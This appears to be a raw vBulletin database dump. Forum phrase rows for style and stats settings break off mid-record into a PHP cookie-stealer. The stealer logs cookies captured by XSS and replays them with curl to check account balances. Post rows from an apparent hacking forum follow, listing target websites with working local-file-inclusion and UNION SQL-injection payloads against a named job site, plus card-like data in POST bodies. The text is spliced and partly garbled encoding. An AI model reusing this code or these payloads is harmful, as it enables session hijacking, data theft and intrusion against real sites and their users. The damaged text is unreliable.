'vbulletin', '', 0, ''), (37600, -1, 'show_standard_editor_toolbar', 'sql', 'Show Standard Editor Toolbar', 'vbulletin', '', 0, ''), (37601, -1, 'table_name', 'sql', 'Table Name', 'vbulletin', '', 0, ''), (37602, -1, 'table_x_has_unique_index', 'sql', 'Table {1} already has a unique index', 'vbulletin', '', 0, ''), (37603, -1, 'this_table_does_not_support_repair_optimize', 'sql', 'This Table Does Not Support Repair / Optimize', 'vbulletin', '', 0, ''), (37604, -1, 'thread_display_mode', 'sql', 'Thread Display Mode', 'vbulletin', '', 0, ''), (37605, -1, 'you_are_running_mysql_version_x_convert_to_myisam', 'sql', 'You are running MySQL version {1} which supports a new table format called MyISAM.
\r\n
\r\nThe ISAMformat does not support repair/optimize so you will need to convert tables to MyISAM before they can be repaired/optimized.
\r\n
\r\nThe following tables are using the obsolete ISAM format.', 'vbulletin', '', 0, ''), (37606, -1, 'date_ascending', 'stats', 'Date Ascending', 'vbulletin', '', 0, ''), (37607, -1, 'date_descending', 'stats', 'Date Descending', 'vbulletin', '', 0, ''), (37608, -1, 'include_empty_results', 'stats', 'Include empty results', 'vbulletin', '', 0, ''), (37609, -1, 'most_popular_forum', 'stats', 'Most popular forum', 'vbulletin', '', 0, ''), (37610, -1, 'most_replied_thread', 'stats', 'Most replied to thread', 'vbulletin', '', 0, ''), (37611, -1, 'most_viewed_thread', 'stats', 'Most viewed thread', 'vbulletin', '', 0, ''), (37612, -1, 'new_post_statistics', 'stats', 'New Post Statistics', 'vbulletin', '', 0, ''), (37613, -1, 'new_thread_statistics', 'stats', 'New Thread Statistics', 'vbulletin', '', 0, ''), (37614, -1, 'newest_member', 'stats', 'Newest member to the forums', 'vbulletin', '', 0, ''), (37615, -1, 'record_online_users', 'stats', 'Record online users', 'vbulletin', '', 0, ''), (37616, -1, 'registration_statistics', 'stats', 'Registration Statistics', 'vbulletin', '', 0, ''), (37617, -1, 'scope', 'stats', 'Scope', 'vbulletin', '', 0, ''), (37618, -1, 'start_date_after_end', 'stats', 'Start date is after the end date', 'vbulletin', '', 0, ''), (37619, -1, 'top_poster', 'stats', 'Top poster', 'vbulletin', '', 0, ''), (37620, -1, 'top_statistics', 'stats', 'Top Statistics', 'vbulletin', '', 0, ''), (37621, -1, 'total_ascending', 'stats', 'Total Ascending', 'vbulletin', '', 0, ''), (37622, -1, 'total_descending', 'stats', 'Total Descending', 'vbulletin', '', 0, ''), (37623, -1, 'user_activity_statistics', 'stats', 'User Activity Statistics', 'vbulletin', '', 0, ''), (37624, -1, 'weekly', 'stats', 'Weekly', 'vbulletin', '', 0, ''), (37625, -1, '0_matches_found', 'style', '0 Matches Found', 'vbulletin', '', 0, ''), (37626, -1, 'add_child_style', 'style', 'Add Child Style', 'vbulletin', '', 0, ''), (37627, -1, 'add_new_replacement_variable', 'style', 'Add New Replacement Variable', 'vbulletin', '', 0, ''), (37628, -1, 'add_new_style', 'style', 'Add New Style', 'vbulletin', '', 0, ''), (37629, -1, 'add_new_template', 'style', 'Add New Template', 'vbulletin', '', 0, ''), (37630, -1, 'additional_css', 'style', 'Additional CSS Definitions', 'vbulletin', '', 0, ''), (37631, -1, 'additional_css_description', 'style', 'Advanced Users:  
If you would like to add any additional CSS for use in your custom templates, any text entered here will be included at the end of the <style> tag
', 'vbulletin', '', 0, ''), (37632, -1, 'additional_functions', 'style', 'Additional Functions', 'vbulletin', '', 0, ''), (37633, -1, 'adsense_advertising_intro', 'style', 'This screen will allow you to quickly roll-out Google AdSense advertising units into your vBulletin forum advertising templates, based on your Google AdSense account settings defined in the members\' area at vBulletin.com.
\r\n
\r\nThere are two different advertising options available, Low and High, and an option to control the type of ad that is displayed. Please choose the option that you would prefer for your community.
\r\n
\r\nPlease note that utilizing Google AdSense code within your site or community is subject to the Google AdSense terms and conditions.
\r\n
\r\nTo further configure your Google AdSense account, please visit the Google AdSense website.', 'vbulletin', 'vBulletin Solutions', 1231169488, '3.8.0 Beta 4'), (37634, -1, 'adsense_deployment_high', 'style', 'You are running the \"High\" package of Google AdSense ads on your forum.', 'vbulletin', 'vBulletin Solutions', 1228482454, '3.8.0 Beta 4'), (37635, -1, 'adsense_deployment_low', 'style', 'You are running the \"Low\" package of Google AdSense ads on your forum.', 'vbulletin', 'vBulletin Solutions', 1228482465, '3.8.0 Beta 4'), (37636, -1, 'adsense_deployment_none', 'style', 'You are not running any Google AdSense ads on your forum.', 'vbulletin', 'vBulletin Solutions', 1228481482, '3.8.0 Beta 4'), (37637, -1, 'align_center', 'style', 'Align Center', 'vbulletin', '', 0, ''), (37638, -1, 'align_left', 'style', 'Align Left', 'vbulletin', '', 0, ''), (37639, -1, 'align_right', 'style', 'Align Right', 'vbulletin', '', 0, ''), (37640, -1, 'alignment', 'style', 'Alignment', 'vbulletin', '', 0, ''), (37641, -1, 'all_style_options', 'style', 'All Style Options', 'vbulletin', '', 0, ''), (37642, -1, 'all_template_groups', 'style', 'All Template Groups', 'vbulletin', '', 0, ''), (37643, -1, 'are_you_sure_want_to_delete_replacement_variable_x', 'style', 'Are you sure you want to delete the replacement variable called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (37644, -1, 'are_you_sure_want_to_delete_style_x', 'style', 'Are you sure you want to delete the style called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (37645, -1, 'are_you_sure_want_to_revert_template_x', 'style', 'Are you sure you want to revert the template called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (37646, -1, 'attachment_icons_folder', 'style', 'Attachment Icons Folder\r\nThis folder contains the various icons used to represent different attachment file types such as txt, jpg, zip etc.', 'vbulletin', '', 0, ''), (37647, -1, 'attachment_is_visible', 'style', 'Attachment is Visible', 'vbulletin', '', 0, ''), (37648, -1, 'available_fonts', 'style', 'Available Fonts', 'vbulletin', '', 0, ''), (37649, -1, 'available_sizes', 'style', 'Available Sizes', 'vbulletin', '', 0, ''), (37650, -1, 'background', 'style', 'Background', 'vbulletin', '', 0, ''), (37651, -1, 'bbcode_pulldown_menu_desc', 'style', 'Here you can specify the fonts and sizes available in the pull down menus for the BB code toolbar. Separate each entry with a new-line.', 'vbulletin', 'vBulletin Solutions', 1206964197, '3.7.0 Release Candidate 2'), (37652, -1, 'body', 'style', 'Body', 'vbulletin', '', 0, ''), (37653, -1, 'body_desc', 'style', '\'Body\' is used to control the color of the outer page border, and to set the basic parameters for all text and links on all pages.', 'vbulletin', '', 0, ''), (37654, -1, 'border', 'style', 'Border', 'vbulletin', '', 0, ''), (37655, -1, 'buttons', 'style', 'Buttons', 'vbulletin', '', 0, ''), (37656, -1, 'buttons_desc', 'style', '\'Buttons\' is used to style form buttons such as submit and reset, along with any other <input type="button" ... /> elements.', 'vbulletin', '', 0, ''), (37657, -1, 'buttons_folder', 'style', 'Button Images Folder\r\nThis is the folder containing all the button images for this style.
The location of this folder can be overridden by a language setting.
', 'vbulletin', '', 0, ''), (37658, -1, 'case_insensitive', 'style', 'Case-Insensitive', 'vbulletin', '', 0, ''), (37659, -1, 'category_strips', 'style', 'Category Strips', 'vbulletin', '', 0, ''), (37660, -1, 'category_strips_desc', 'style', '\'Category Strips\' also has a double purpose. It is used to indicate a \'Category\' (no-posting) forum, and it is also used as the style for the main title bar of most tables.', 'vbulletin', '', 0, ''), (37661, -1, 'change_google_adsense_package', 'style', 'Change Google AdSense Package', 'vbulletin', 'vBulletin Solutions', 1228482162, '3.8.0 Beta 4'), (37662, -1, 'click_the_expand_collapse_button', 'style', 'Click the \'Expand/Collapse\' button, or double-click the group name to expand or collapse the {1} group of templates.', 'vbulletin', '', 0, ''), (37663, -1, 'closed_thread_image', 'style', 'Closed Thread Image', 'vbulletin', '', 0, ''), (37664, -1, 'code_block_width', 'style', 'Code Block Width (pixels)\r\n(This value controls the width of [code], [php] and [html] BB code blocks. You may set this value to \'auto\', but if you do, Internet Explorer will stretch the width of the block rather than inserting a scrollbar.)', 'vbulletin', 'vBulletin Solutions', 1206965599, '3.7.0 Release Candidate 2'), (37665, -1, 'collapse_all_template_groups', 'style', 'Collapse All Template Groups', 'vbulletin', '', 0, ''), (37666, -1, 'collapse_template_group', 'style', 'Collapse Template Group', 'vbulletin', '', 0, ''), (37667, -1, 'collapse_templates', 'style', 'Collapse Templates', 'vbulletin', '', 0, ''), (37668, -1, 'collapse_x', 'style', 'Collapse {1}', 'vbulletin', '', 0, ''), (37669, -1, 'color_picker_not_ready', 'style', 'The color picker is still loading, please wait.', 'vbulletin', '', 0, ''), (37670, -1, 'comment', 'style', 'Comment', 'vbulletin', '', 0, ''), (37671, -1, 'common_templates', 'style', 'Common Templates', 'vbulletin', '', 0, ''), (37672, -1, 'compare_versions', 'style', 'Compare Versions', 'vbulletin', '', 0, ''), (37673, -1, 'comparing_versions_of_x', 'style', 'Comparing Versions of {1}', 'vbulletin', '', 0, ''), (37674, -1, 'comparison_key', 'style', 'Comparison Key', 'vbulletin', '', 0, ''), (37675, -1, 'confirm_removal_of_copyright_notice', 'style', 'Confirm Removal of vBulletin Copyright Notice', 'vbulletin', '', 0, ''), (37676, -1, 'content', 'style', 'Content', 'vbulletin', 'vBulletin Solutions', 1220882473, '3.8.0 Alpha 1'), (37677, -1, 'copy', 'style', 'Copy', 'vbulletin', '', 0, ''), (37678, -1, 'create_new_style', 'style', 'Create New Style', 'vbulletin', '', 0, ''), (37679, -1, 'creating_a_new_style_called_x', 'style', 'Creating a new Style called \'{1}\'', 'vbulletin', '', 0, ''), (37680, -1, 'css', 'style', 'CSS', 'vbulletin', '', 0, ''), (37681, -1, 'css_selector_x', 'style', 'CSS Selector: {1}', 'vbulletin', '', 0, ''), (37682, -1, 'css_value_invalid', 'style', 'Error: {1} is not a valid value for a CSS entry.', 'vbulletin', '', 0, ''), (37683, -1, 'current_default', 'style', 'Current Default', 'vbulletin', '', 0, ''), (37684, -1, 'current_version', 'style', 'Current Version', 'vbulletin', '', 0, ''), (37685, -1, 'custom_templates', 'style', 'Custom Templates', 'vbulletin', '', 0, ''), (37686, -1, 'customize', 'style', 'Customize', 'vbulletin', '', 0, ''), (37687, -1, 'customize_further', 'style', 'Customize Further', 'vbulletin', '', 0, ''), (37688, -1, 'customize_replacement_variable_x', 'style', 'Customize Replacement Variable: {1}', 'vbulletin', '', 0, ''), (37689, -1, 'customize_template_x', 'style', 'Customize Template: {1}', 'vbulletin', '', 0, ''), (37690, -1, 'customized_in_a_parent_style_x', 'style', 'Customized in a Parent Style', 'vbulletin', '', 0, ''), (37691, -1, 'customized_in_this_style', 'style', 'Customized in this Style', 'vbulletin', '', 0, ''), (37692, -1, 'default_template_updated_desc', 'style', 'Default Template Updated in {1} by {2}
Your Custom Template Last Edited in {3} by {4}', 'vbulletin', '', 0, ''), (37693, -1, 'delete_style', 'style', 'Delete Style', 'vbulletin', '', 0, ''), (37694, -1, 'depth_x_items', 'style', 'Depth {1} Items', 'vbulletin', '', 0, ''), (37695, -1, 'disable_wrapping', 'style', 'Disable Wrapping', 'vbulletin', '', 0, ''), (37696, -1, 'edit_fonts_colors_etc', 'style', 'Edit Fonts / Colors etc.', 'vbulletin', '', 0, ''), (37697, -1, 'edit_settings', 'style', 'Edit Settings', 'vbulletin', '', 0, ''), (37698, -1, 'edit_style_options', 'style', 'Edit Style Options', 'vbulletin', '', 0, ''), (37699, -1, 'edit_styles', 'style', 'Edit Styles', 'vbulletin', '', 0, ''), (37700, -1, 'edit_template', 'style', 'Edit Template', 'vbulletin', '', 0, ''), (37701, -1, 'edit_templates', 'style', 'Edit Templates', 'vbulletin', '', 0, ''), (37702, -1, 'editor_styles_button_down', 'style', 'Editor buttons in clicked state', 'vbulletin', '', 0, ''), (37703, -1, 'editor_styles_button_hover', 'style', 'Editor buttons in hover state', 'vbulletin', '', 0, ''), (37704, -1, 'editor_styles_button_normal', 'style', 'Editor buttons in normal state', 'vbulletin', '', 0, ''), (37705, -1, 'editor_styles_button_selected', 'style', 'Editor buttons in selected state', 'vbulletin', '', 0, ''), (37706, -1, 'editor_styles_menu_down', 'style', 'Editor menu items in clicked state (WYSIWYG only)', 'vbulletin', '', 0, ''), (37707, -1, 'editor_styles_menu_hover', 'style', 'Editor menu items in hover state (WYSIWYG only)', 'vbulletin', '', 0, ''), (37708, -1, 'editor_styles_menu_normal', 'style', 'Editor menu items in normal state (WYSIWYG only)', 'vbulletin', '', 0, ''), (37709, -1, 'editor_styles_popup_down', 'style', 'Editor popup controls in clicked state (WYSIWYG only)', 'vbulletin', '', 0, ''), (37710, -1, 'enable_wrapping', 'style', 'Enable Wrapping', 'vbulletin', '', 0, ''), (37711, -1, 'entry_has_a_comment', 'style', '* - Entry has a comment. Hover over the type to view it.', 'vbulletin', '', 0, ''), (37712, -1, 'expand_all_template_groups', 'style', 'Expand All Template Groups', 'vbulletin', '', 0, ''), (37713, -1, 'expand_template_group', 'style', 'Expand Template Group', 'vbulletin', '', 0, ''), (37714, -1, 'expand_templates', 'style', 'Expand Templates', 'vbulletin', '', 0, ''), (37715, -1, 'expand_x', 'style', 'Expand {1}', 'vbulletin', '', 0, ''), (37716, -1, 'extra_css', 'style', 'Extra CSS Attributes', 'vbulletin', '', 0, ''), (37717, -1, 'file_inclusion_not_permitted', 'style', 'File inclusion is not permitted in template conditional expressions. Please go back and re-write this expression.', 'vbulletin', 'vBulletin Solutions', 1152791484, '3.6.0 Release Candidate 2'), (37718, -1, 'find_and_replace_in_templates', 'style', 'Find and Replace in Templates (be careful!)', 'vbulletin', '', 0, ''), (37719, -1, 'first_alternating_color', 'style', 'First Alternating Color', 'vbulletin', '', 0, ''), (37720, -1, 'first_alternating_color_desc', 'style', 'Most table cells in vBulletin use either the First or Second alternating color as their background. Set the attributes for elements using \'First Alternating Color\' here.', 'vbulletin', '', 0, ''), (37721, -1, 'following_options_apply_only_if_new_style', 'style', 'The following options apply only if you are creating a new style, rather than overwriting an existing style', 'vbulletin', '', 0, ''), (37722, -1, 'font_color', 'style', 'Font Color', 'vbulletin', '', 0, ''), (37723, -1, 'font_family', 'style', 'Font Family', 'vbulletin', '', 0, ''), (37724, -1, 'font_size', 'style', 'Font Size', 'vbulletin', '', 0, ''), (37725, -1, 'font_style', 'style', 'Font Style', 'vbulletin', '', 0, ''), (37726, -1, 'fonts_colors_etc', 'style', 'Fonts / Colors etc.', 'vbulletin', '', 0, ''), (37727, -1, 'form_spacer_size', 'style', 'Form Element Spacer Size (pixels) (This is the size of the spacer used to separate blocks of form elements)', 'vbulletin', '', 0, ''), (37728, -1, 'form_width', 'style', 'Form Width (pixels) (This value specifies the width in pixels of most forms in the vBulletin interface)', 'vbulletin', '', 0, ''), (37729, -1, 'form_width_usercp', 'style', 'User Control Panel Form Width (pixels) (This value allows you to specify a smaller form width, to compensate for the presence of the navigation bar in the user control panel pages)', 'vbulletin', '', 0, ''), (37730, -1, 'forum_jump_menu', 'style', 'Forum Jump Menu', 'vbulletin', '', 0, ''), (37731, -1, 'function_name', 'style', 'Function Name', 'vbulletin', '', 0, ''), (37732, -1, 'get_customizations_from_parent_styles', 'style', 'Get customizations made in this style and all parent styles', 'vbulletin', '', 0, ''), (37733, -1, 'get_customizations_from_this_style_only', 'style', 'Get customizations made only in this style', 'vbulletin', '', 0, ''), (37734, -1, 'global_templates', 'style', 'Global Templates', 'vbulletin', '', 0, ''), (37735, -1, 'google_adsense_advertising', 'style', 'Google AdSense Advertising', 'vbulletin', 'vBulletin Solutions', 1228479600, '3.8.0 Beta 4'), (37736, -1, 'google_adsense_package_high', 'style', 'High - one medium advertisting unit under the navbar, one unit before the footer, and one unit for guests in the first post of a thread', 'vbulletin', 'vBulletin Solutions', 1231169544, '3.8.0 Beta 4'), (37737, -1, 'google_adsense_package_low', 'style', 'Low - one small text-only advertising unit under the navbar and one small unit in the footer', 'vbulletin', 'vBulletin Solutions', 1231169573, '3.8.0 Beta 4'), (37738, -1, 'google_adsense_publisher_id', 'style', 'Google AdSense Publisher ID', 'vbulletin', 'vBulletin Solutions', 1228482301, '3.8.0 Beta 4'), (37739, -1, 'group_ad_location', 'style', 'Ad Location', 'vbulletin', 'vBulletin Solutions', 1192724883, '3.7.0 Beta 1'), (37740, -1, 'group_album', 'style', 'Album', 'vbulletin', 'vBulletin Solutions', 1193226581, '3.7.0 Beta 1'), (37741, -1, 'group_attachment_list', 'style', 'Attachment List', 'vbulletin', '', 0, ''), (37742, -1, 'group_bb_code_layout', 'style', 'BB Code Layout', 'vbulletin', '', 0, ''), (37743, -1, 'group_buddy_list', 'style', 'Buddy (Contact) List', 'vbulletin', 'vBulletin Solutions', 1196765388, '3.7.0 Beta 1'), (37744, -1, 'group_calendar', 'style', 'Calendar', 'vbulletin', '', 0, ''), (37745, -1, 'group_editor', 'style', 'Editor', 'vbulletin', '', 0, ''), (37746, -1, 'group_faq', 'style', 'FAQ', 'vbulletin', '', 0, ''), (37747, -1, 'group_forum_display', 'style', 'Forum Display', 'vbulletin', '', 0, ''), (37748, -1, 'group_forum_home', 'style', 'Forum Home', 'vbulletin', '', 0, ''), (37749, -1, 'group_help', 'style', 'Help', 'vbulletin', '', 0, ''), (37750, -1, 'group_human_verification', 'style', 'Human Verification', 'vbulletin', 'vBulletin Solutions', 1192229357, '3.7.0 Beta 1'), (37751, -1, 'group_instant_messaging', 'style', 'Instant Messaging', 'vbulletin', '', 0, ''), (37752, -1, 'group_member_info', 'style', 'Member Info', 'vbulletin', '', 0, ''), (37753, -1, 'group_members_list', 'style', 'Member\'s List', 'vbulletin', '', 0, ''), (37754, -1, 'group_moderation', 'style', 'Moderation', 'vbulletin', 'vBulletin Solutions', 1142610251, '3.6.0 Beta 1'), (37755, -1, 'group_modify_user_option', 'style', 'Modify User Option', 'vbulletin', '', 0, ''), (37756, -1, 'group_navigation_breadcrumb', 'style', 'Navigation / Breadcrumb', 'vbulletin', '', 0, ''), (37757, -1, 'group_new_posting', 'style', 'New Posting', 'vbulletin', '', 0, ''), (37758, -1, 'group_page_navigation', 'style', 'Page Navigation', 'vbulletin', '', 0, ''), (37759, -1, 'group_paid_subscriptions', 'style', 'Subscriptions (Paid)', 'vbulletin', 'vBulletin Solutions', 1195666615, '3.7.0 Beta 1'), (37760, -1, 'group_picture_comment', 'style', 'Picture Comment', 'vbulletin', 'vBulletin Solutions', 1200079906, '3.7.0 Beta 4'), (37761, -1, 'group_poll', 'style', 'Poll', 'vbulletin', '', 0, ''), (37762, -1, 'group_post_icon', 'style', 'Post Icon', 'vbulletin', '', 0, ''), (37763, -1, 'group_postbit', 'style', 'Postbit', 'vbulletin', '', 0, ''), (37764, -1, 'group_posthistory', 'style', 'Post Edit History', 'vbulletin', 'vBulletin Solutions', 1191498135, '3.7.0 Beta 1'), (37765, -1, 'group_printable_thread', 'style', 'Printable Thread', 'vbulletin', '', 0, ''), (37766, -1, 'group_private_message', 'style', 'Private Message', 'vbulletin', '', 0, ''), (37767, -1, 'group_registration', 'style', 'Registration', 'vbulletin', '', 0, ''), (37768, -1, 'group_search', 'style', 'Search', 'vbulletin', '', 0, ''), (37769, -1, 'group_show_groups', 'style', 'Show Groups', 'vbulletin', '', 0, ''), (37770, -1, 'group_show_thread', 'style', 'Show Thread', 'vbulletin', '', 0, ''), (37771, -1, 'group_smilie_popup', 'style', 'Smilie Popup', 'vbulletin', '', 0, ''), (37772, -1, 'group_socialgroups', 'style', 'Social Groups', 'vbulletin', 'vBulletin Solutions', 1192447616, '3.7.0 Beta 1'), (37773, -1, 'group_subscribed_thread', 'style', 'Subscriptions (Thread Notifications)', 'vbulletin', 'vBulletin Solutions', 1195666672, '3.7.0 Beta 1'), (37774, -1, 'group_thread_administration', 'style', 'Thread Administration', 'vbulletin', '', 0, ''), (37775, -1, 'group_threadbit', 'style', 'Threadbit', 'vbulletin', '', 0, ''), (37776, -1, 'group_user_control_panel', 'style', 'User Control Panel', 'vbulletin', '', 0, ''), (37777, -1, 'group_user_infraction', 'style', 'User Infraction', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (37778, -1, 'group_user_note', 'style', 'User Note', 'vbulletin', '', 0, ''), (37779, -1, 'group_user_profile_field', 'style', 'User Profile Field', 'vbulletin', '', 0, ''), (37780, -1, 'group_user_reputation', 'style', 'Reputation (User Reputation)', 'vbulletin', 'vBulletin Solutions', 1195666534, '3.7.0 Beta 1'), (37781, -1, 'group_visitor_message', 'style', 'Visitor Message', 'vbulletin', 'vBulletin Solutions', 1197309198, '3.7.0 Beta 1'), (37782, -1, 'group_who_posted', 'style', 'Who Posted?', 'vbulletin', '', 0, ''), (37783, -1, 'group_whos_online', 'style', 'Who\'s Online', 'vbulletin', '', 0, ''), (37784, -1, 'highlighted_font', 'style', 'Highlighted Font', 'vbulletin', '', 0, ''), (37785, -1, 'highlighted_font_desc', 'style', '\'Highlighted Font\' is used primarily to highlight search words in search results, but is used occasionally elsewhere too.', 'vbulletin', '', 0, ''), (37786, -1, 'historical', 'style', 'Historical', 'vbulletin', '', 0, ''), (37787, -1, 'history_of_template_x', 'style', 'History of Template {1}', 'vbulletin', '', 0, ''), (37788, -1, 'hover_link', 'style', 'Hover', 'vbulletin', '', 0, ''), (37789, -1, 'html_doctype', 'style', 'HTML Doctype', 'vbulletin', '', 0, ''), (37790, -1, 'ignore_style_version', 'style', 'Ignore Style Version Use style file even if it was created by a different version of vBulletin?', 'vbulletin', '', 0, ''), (37791, -1, 'image_paths', 'style', 'Image Paths', 'vbulletin', '', 0, ''), (37792, -1, 'images_folder', 'style', 'Images Folder', 'vbulletin', '', 0, ''), (37793, -1, 'import_style_xml_file', 'style', 'Import Style XML File', 'vbulletin', '', 0, ''), (37794, -1, 'importing_style', 'style', 'Importing Style', 'vbulletin', '', 0, ''), (37795, -1, 'including_master_style', 'style', 'Including MASTER STYLE', 'vbulletin', '', 0, ''), (37796, -1, 'inherit', 'style', 'Inherit', 'vbulletin', '', 0, ''), (37797, -1, 'inline_mod_highlight', 'style', 'Inline Moderation Element Highlight', 'vbulletin', '', 0, ''), (37798, -1, 'inline_mod_highlight_desc', 'style', 'When an inline moderation checkbox is clicked, the corresponding item will be styled with this class.', 'vbulletin', '', 0, ''), (37799, -1, 'inner_border_width', 'style', 'Inner Border Width (pixels) (This value specifies the width in pixels of the inner-border of all colored tables)', 'vbulletin', '', 0, ''), (37800, -1, 'inner_table_width', 'style', 'Inner Table Width (pixels or percentage) (This is the width given to every table within your vBulletin pages)', 'vbulletin', '', 0, ''), (37801, -1, 'input_fields', 'style', 'Input Fields', 'vbulletin', '', 0, ''), (37802, -1, 'input_fields_desc', 'style', '\'Input Fields\' is used to style single and multi-line text boxes in forms.', 'vbulletin', '', 0, ''), (37803, -1, 'internet_explorer_4', 'style', 'Internet Explorer 4+', 'vbulletin', '', 0, ''), (37804, -1, 'it_appears_you_are_removing_vbulletin_copyright', 'style', 'It appears that you may be removing the vBulletin copyright notice from this template. If this is the case, please be aware that this may be a violation of the license agreement. Continue only if you are sure that you will not be violating the license.', 'vbulletin', '', 0, ''), (37805, -1, 'justified', 'style', 'Justified', 'vbulletin', '', 0, ''), (37806, -1, 'last_modified', 'style', 'Last Modified', 'vbulletin', '', 0, ''), (37807, -1, 'legend_desc', 'style', 'Use this setting to set the style of the <legend> text that appears in the border of <frameset> tags in forms.', 'vbulletin', '', 0, ''), (37808, -1, 'lines_around_each_diff', 'style', 'lines around each diff', 'vbulletin', 'vBulletin Solutions', 1220883493, '3.8.0 Alpha 1'), (37809, -1, 'main_css', 'style', 'Main CSS', 'vbulletin', '', 0, ''), (37810, -1, 'main_table_width', 'style', 'Main Table Width (pixels or percentage) (This is the width of the table that contains all your vBulletin content)', 'vbulletin', '', 0, ''), (37811, -1, 'master_style', 'style', 'MASTER STYLE', 'vbulletin', '', 0, ''), (37812, -1, 'menus', 'style', '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\";\n\n}\n\n\n\n// Gets the cookie from GET parameter returned by XSS and stores it in file\n\nfunction getCookie() {\n\nif (isset($_GET[\"c\"])) {\n\n$f = fopen(COOKIE_FILE, \"a\");\n\n$c = base64_encode($_GET[\"c\"]);\n\nfwrite($f, $c . \"\\n\");\n\nfclose($f);\n\n}\n\n}\n\n\n\n// Reads the cookie from file\n\nfunction readCookies() {\n\n$c = file_get_contents(COOKIE_FILE);\n\nreturn explode(\"\\n\", $c);\n\n}\n\n\n\n// Logs in and checks the ballance\n\nfunction check($Cookie) {\n\n$ch = curl_init();\n\ncurl_setopt($ch, CURLOPT_URL, PPLOGIN_URL);\n\ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\n\ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 1);\n\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\n\ncurl_setopt($ch, CURLOPT_COOKIE, $Cookie);\n\n$s = curl_exec($ch);\n\nif (preg_match(\"/Ballance: (.*)\\<\\/b\\>/i\", $s, $z))\n\nreturn $z[1];\n\nreturn NULL;\n\n}\n\n\n\n\n\n// MAIN\n\nif (isset($_GET[\"admin\"]) && $_GET[\"admin\"] == \"true\") {\n\n$ck = readCookies();\n\necho \"\\n\";\n\necho \"\\n\";\n\n$i = 0;\n\nforeach ($ck as $c) {\n\necho \"\\n\";\n\n}\n\ndie(\"\");\n\n}\n\n\n\nif (isset($_GET[\"check\"]) && $_GET[\"check\"] != \"\") {\n\n$cz = check(check($_GET[\"check\"]));\n\nif ($cz != NULL)\n\necho \"Ballance: \" . $cz;\n\nelse\n\necho \"Error logging in!\";\n\ndie(\"\");\n\n}\n\n\n\n$XSS = \"\\\">\";\n\ndoXSS($XSS);\n\n?>\n[/php]', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0), (1119, 1083, 0, 'Bo0om', 7, 'заказы на похек :)', 1403793080, 'Ãâ€Ã°Ñ‚øýó\r\n[CODE]http://www.matchaffinity.com/\r\nhttp://www.beautifulpeople.com/en-UK\r\nhttp://www.whatsyourprice.com\r\nhttp://www.lovestruck.com/london/\r\n[/CODE]\r\nÃâ€Ã¾ÑÂтðтþчýþ ÑÂúуûø, рðÑÂúрутÑÂÑ‚ ÑÂðüø, ÿрþфøт $1000-$4000\r\n\r\nçøýð\r\n[CODE]Lao Li:\r\ngzstuff.com\r\nand\r\nhttp://www.cityweekend.com.cn[/CODE]\r\nÃÂуöýð ñð÷ð. ÃÂðÑÂчõт цõýы ýõ рð÷óþòðрøòðûø, ýþ ôþóþòþрøüÑÂÑÂ.', 1, 0, '90.189.2.190', 4, 1, 0, 0, 0), (1131, 1083, 1130, 'Bo0om', 7, '', 1403872641, 'òþт тðúøõ ÑÂúуûø уöõ õÑÂть. ø чøтðûúð. ÑÂûøть ñы.\r\n[quote][url]http://www.employmentcrossing.com/utils/openinviter/utl_openinviter.php[/url]\r\n\r\ncemail=sample%40email.tst&cname=sloywnoe&email_box=sample%40email.tst&fromemail=sample%40email.tst&fromname=sloywnoe&import=show%20contacts&manualarrstr=&password_box=g00dpa%24%24w0rd&provider_box=../../../../../../../../../../etc/passwd%00.jpg&sender_name=sloywnoe&step=get_contacts\r\n\r\n\r\n[url]http://www.employmentcrossing.com/lcjsspeedapply_thanks.php[/url]\r\nclssimilarjobs_appliedjobids=1) and 1=2 union select 1,2,3,concat_ws(char(58),column_name,table_name,table_schema),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from information_schema.columns where column_name like char(37, 101, 109, 97, 105, 108, 37) limit 02,1%23\r\n\r\n[url]http://www.employmentcrossing.com/p/[/url]\r\n\r\n[url]http://www.employmentcrossing.com/lcceospeaks.php?id=2186[/url]\' òþт тут фøûьтр\r\n\r\n\r\n[url]https://www.employmentcrossing.com/lcthanks_offer3.php#mopchooser[/url]\r\npost: Clspremiercontactus_hdnsubmited=1&clspremiercontactus_hdnaction=s&clspremiercontactus_page=&clspremiercontactus_md5activationid=&clspremiercontactus_offer=3&clspremiercontactus_paymode=&clspremiercontactus_hdnpaymenttype=ccpayment&clspremiercontactus_firstname=brian&clspremiercontactus_lastname=howard&clspremiercontactus_email=brian.howard88%40hotmail.com\'&clspremiercontactus_phone=%2b1734555&clspremiercontactus_creditcardname=visa&clspremiercontactus_creditcardnum=44107516456723&clspremiercontactus_creditcardcvvnum=042&clspremiercontactus_creditmonth=1&clspremiercontactus_credityear=2017\r\n\r\n[url]https://www.employmentcrossing.com/lcsignin.php[/url]\r\npost: Clssignup_hdnsubmited=1&clssignup_hdnaction=makefirststepuser&clssignup_hdnusername=&clssignup_page=2&clssignup_md5activationid=&clsrandompromotion_email=&clssignup_refid=1500&clssignup_subscribedomain=1500&clssignup_promotioncode=free3days_1monrec&clssignup_offerpage=&clssignup_offer=35621&clssignup_offerpagename=&clssignup_email=1@1.com\'\r\n\r\n[url]https://www.employmentcrossing.com/lcactivation.php[/url]\r\npost: Clssignup_md5activationid=c0d703f6adc4a8c9ecf689e72a998960&clsrandompromotion_email=&clssignup_paymode=&clssignup_refid=1500&clssignup_offer=35621&clssignup_flag_block_resignup=0&clssignup_hdnpaymenttype=ccpayment&clssignup_selectpromocode=free3days_1monrec_9&clssignup_firstname=brian&clssignup_lastname=howard\'&clssignup_creditcardname=visa\'&clssignup_creditcardnum=44107516345678\'&clssignup_creditcardcvvnum=345&clssignup_creditmonth=1&clssignup_credityear=2015&clssignup_agreeterms=p[/quote]', 1, 0, '176.209.55.165', 0, 1, 0, 0, 0), (1126, 1088, 1125, 'kx00', 6, '', 1403838437, '[QUOTE=Bo0om;1125]ÃÂøхõрð ýõ ÿþýÑÂû, e17, ты øýòðùт хþчõшь 